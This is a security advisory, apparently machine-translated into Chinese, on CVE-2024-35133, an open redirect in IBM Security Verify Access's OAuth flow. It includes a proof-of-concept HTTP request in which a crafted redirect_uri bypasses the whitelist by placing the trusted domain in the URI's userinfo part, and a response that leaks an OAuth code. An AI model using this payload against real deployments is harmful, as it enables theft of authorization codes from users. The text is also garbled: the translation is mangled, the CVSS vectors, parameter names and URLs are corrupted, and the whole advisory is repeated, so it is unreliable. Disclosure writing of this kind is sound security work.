-IBM Security验证访问=10.0.0=10.0.8- OAUTH FLOW期间打开重定向
===========================================================================================
0。概述
1。详细说明
2。概念证明
3。解决方案
4。披露时间表
5。参考
6。学分
7。法律通知
=================================================================================================
修订版:
1.0
Impact:
通过说服受害者访问一个专门精心设计的网站,一个遥远的网站
攻击者可以利用这种脆弱性来破坏显示的URL
将用户重定向到一个恶意网站,似乎是
值得信赖。这可以使攻击者获得高度敏感的
信息或对受害者进行进一步攻击。
严重性:
NIST:高
IBM:培养基
CVSS得分为:
NIST 8.2(CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C33:H/i:H/i:L/a:n)
IBM 6.8(CVSS:3.1/AV:N/AC:L/PR:L/UI3:R/S:C/C33:N/I3:H/i:H/a:N)
CVE-ID:
CVE-2024-35133
vendor:
IBM
受影响的产品:
IBM安全验证访问
IBM安全验证访问Docker
受影响的版本:
10.0.0-10.0.8
产品描述:
IBM安全验证访问是完整的授权和网络
安全策略管理解决方案。它提供端到端的保护
大于地理上分散的内部集群和外部网络的资源。
除了最先进的安全策略管理外,IBM安全
验证访问提供身份验证,授权,数据安全和
集中资源管理功能。
IBM安全验证访问提供以下功能:
身份验证〜提供了广泛的内置身份验证器和
支持外部身份验证者。
授权〜提供许可证并拒绝保护资源的决定
通过授权API在安全域中的请求。
数据安全和集中资源管理〜管理安全访问安全访问
通过使用公共互联网的私人内部基于网络的资源
公司防火墙系统的广泛连接性和易用性。
=======1。详细说明======================================================================================
在对客户的OAuth流动的渗透测试中,发现了一个
打开重定向漏洞,可能导致OAuth“代码”变量的泄漏。
可以绕过解析器的逻辑负责验证
oauth期间的“ redirect_uri”参数的正确性和有效性
通过利用RFC 3986(3.2.1)直接提供用户名和密码来流动
在统一资源标识符(URI)中。
通过将“用户名”字段提供为合法和预期的域,
可以绕过“ IBM Security验证访问”使用的白名单过滤器
并导致开放重定向到由攻击者控制的任何任意域,
不仅改变了预期的流量并将用户重定向到恶意
似乎值得信赖的网站。
这可以使攻击者能够获得高度敏感的“代码”
令牌或对受害者进行进一步攻击
=====================================================================================
=====请求=====
[[[[
得到/oauth/oauth20/授权?wendesp_type=codeclient_id=[已编辑]状态=001710863806728MPUW0XFSJREDACTED_URI=3https://legiti mate.domain:[email protected]/[redacted]/openID/redacted/[redacted/[redacted] scope=OpenID+ http/1.1
HOST: [已编辑]
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
连接:关闭
]]]]
=====响应=====
[[[[
发现HTTP/1.1 302
content-Language: en-us
Date: TUE,2024年3月19日16:04:35 GMT
位置: https://legitimate.domain:[email protected]/[redacted]/openID/re dacted/[已编辑]?状态=001710863806728MPUW0XFSJCODE=7WKH581Y0UYS0NM4FF65ZCQQH0WC46W7VISS=[REDACTED]
p3p: cp='non cur otpi我们的nori'
X-Frame-Options:拒绝
X-content-type-options: nosniff
cache-control:无存储
X-XSS-Protection: 1;模式=块
X-Perment-cross-domain-Policies:无
跨原生蛋白- 资源- 波利切:相同站点
content-security-policy:框架- 委员会'none'
推荐人- 票房:无引用者- 当时
strict-transport-security: max-age=31536000;包括Ububdomains
pragma:无缓存
内容长度: 0。
]]]]
========3。
有关补丁,升级或
建议的解决方法。
有关更多详细信息,请参见“参考”。
===================================================================================
19/03/2024-安全研究人员(Giulio Garzia)发现的脆弱性
21/03/2024-与承诺的客户共享的漏洞
依靠IBM SVA对他的基础设施进行渗透测试
02/04/2024-与IBM共享的漏洞
02/04/2024- IBM接管的漏洞
14/05/2024- IBM确认的漏洞
18/07/2024- IBM向客户提供的预订前释放以验证
解决脆弱性
27/08/2024- IBM共享的安全公告和漏洞
5。
(1)https://www.ibm.com/support/pages/s...erify-verify-verify-cerces-cve-cve-2024-35133
(2)https://exchange.xforce.ibmcloud.com/VULNERABIONICY/291026
(3)https://nvd.nist.gov/vuln/detail/cve-2024-35133
(4)https://cwe.mitre.org/data/definitions/178.html
6。
在:中发现并报告了此漏洞
Giulio Garzia'Ozozuz'
联系人:
7。
版权(C)2024 Giulio Garzia'Ozozuz'
授予该警报重新分配的许可
电子方式。没有我的Express,它可能不会以任何方式进行编辑
书面同意。如果您想重印全部或任何
该警报的一部分在电子上以外的任何其他介质中
请给我发电子邮件以获取许可。
免责声明:建议中的信息被认为是准确的
根据当前可用的信息发布时。
使用信息构建体接受为AS
健康)状况。
对于此信息,没有任何保证。也不是
作者和发行人对任何直接的责任承担任何责任,
间接或因使用而造成的损失或损害
或依赖此信息。
===========================================================================================
0。概述
1。详细说明
2。概念证明
3。解决方案
4。披露时间表
5。参考
6。学分
7。法律通知
=================================================================================================
修订版:
1.0
Impact:
通过说服受害者访问一个专门精心设计的网站,一个遥远的网站
攻击者可以利用这种脆弱性来破坏显示的URL
将用户重定向到一个恶意网站,似乎是
值得信赖。这可以使攻击者获得高度敏感的
信息或对受害者进行进一步攻击。
严重性:
NIST:高
IBM:培养基
CVSS得分为:
NIST 8.2(CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C33:H/i:H/i:L/a:n)
IBM 6.8(CVSS:3.1/AV:N/AC:L/PR:L/UI3:R/S:C/C33:N/I3:H/i:H/a:N)
CVE-ID:
CVE-2024-35133
vendor:
IBM
受影响的产品:
IBM安全验证访问
IBM安全验证访问Docker
受影响的版本:
10.0.0-10.0.8
产品描述:
IBM安全验证访问是完整的授权和网络
安全策略管理解决方案。它提供端到端的保护
大于地理上分散的内部集群和外部网络的资源。
除了最先进的安全策略管理外,IBM安全
验证访问提供身份验证,授权,数据安全和
集中资源管理功能。
IBM安全验证访问提供以下功能:
身份验证〜提供了广泛的内置身份验证器和
支持外部身份验证者。
授权〜提供许可证并拒绝保护资源的决定
通过授权API在安全域中的请求。
数据安全和集中资源管理〜管理安全访问安全访问
通过使用公共互联网的私人内部基于网络的资源
公司防火墙系统的广泛连接性和易用性。
=======1。详细说明======================================================================================
在对客户的OAuth流动的渗透测试中,发现了一个
打开重定向漏洞,可能导致OAuth“代码”变量的泄漏。
可以绕过解析器的逻辑负责验证
oauth期间的“ redirect_uri”参数的正确性和有效性
通过利用RFC 3986(3.2.1)直接提供用户名和密码来流动
在统一资源标识符(URI)中。
通过将“用户名”字段提供为合法和预期的域,
可以绕过“ IBM Security验证访问”使用的白名单过滤器
并导致开放重定向到由攻击者控制的任何任意域,
不仅改变了预期的流量并将用户重定向到恶意
似乎值得信赖的网站。
这可以使攻击者能够获得高度敏感的“代码”
令牌或对受害者进行进一步攻击
=====================================================================================
=====请求=====
[[[[
得到/oauth/oauth20/授权?wendesp_type=codeclient_id=[已编辑]状态=001710863806728MPUW0XFSJREDACTED_URI=3https://legiti mate.domain:[email protected]/[redacted]/openID/redacted/[redacted/[redacted] scope=OpenID+ http/1.1
HOST: [已编辑]
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
连接:关闭
]]]]
=====响应=====
[[[[
发现HTTP/1.1 302
content-Language: en-us
Date: TUE,2024年3月19日16:04:35 GMT
位置: https://legitimate.domain:[email protected]/[redacted]/openID/re dacted/[已编辑]?状态=001710863806728MPUW0XFSJCODE=7WKH581Y0UYS0NM4FF65ZCQQH0WC46W7VISS=[REDACTED]
p3p: cp='non cur otpi我们的nori'
X-Frame-Options:拒绝
X-content-type-options: nosniff
cache-control:无存储
X-XSS-Protection: 1;模式=块
X-Perment-cross-domain-Policies:无
跨原生蛋白- 资源- 波利切:相同站点
content-security-policy:框架- 委员会'none'
推荐人- 票房:无引用者- 当时
strict-transport-security: max-age=31536000;包括Ububdomains
pragma:无缓存
内容长度: 0。
]]]]
========3。
有关补丁,升级或
建议的解决方法。
有关更多详细信息,请参见“参考”。
===================================================================================
19/03/2024-安全研究人员(Giulio Garzia)发现的脆弱性
21/03/2024-与承诺的客户共享的漏洞
依靠IBM SVA对他的基础设施进行渗透测试
02/04/2024-与IBM共享的漏洞
02/04/2024- IBM接管的漏洞
14/05/2024- IBM确认的漏洞
18/07/2024- IBM向客户提供的预订前释放以验证
解决脆弱性
27/08/2024- IBM共享的安全公告和漏洞
5。
(1)https://www.ibm.com/support/pages/s...erify-verify-verify-cerces-cve-cve-2024-35133
(2)https://exchange.xforce.ibmcloud.com/VULNERABIONICY/291026
(3)https://nvd.nist.gov/vuln/detail/cve-2024-35133
(4)https://cwe.mitre.org/data/definitions/178.html
6。
在:中发现并报告了此漏洞
Giulio Garzia'Ozozuz'
联系人:
正在加载...
www.linkedin.com
正在加载...
github.com
版权(C)2024 Giulio Garzia'Ozozuz'
授予该警报重新分配的许可
电子方式。没有我的Express,它可能不会以任何方式进行编辑
书面同意。如果您想重印全部或任何
该警报的一部分在电子上以外的任何其他介质中
请给我发电子邮件以获取许可。
免责声明:建议中的信息被认为是准确的
根据当前可用的信息发布时。
使用信息构建体接受为AS
健康)状况。
对于此信息,没有任何保证。也不是
作者和发行人对任何直接的责任承担任何责任,
间接或因使用而造成的损失或损害
或依赖此信息。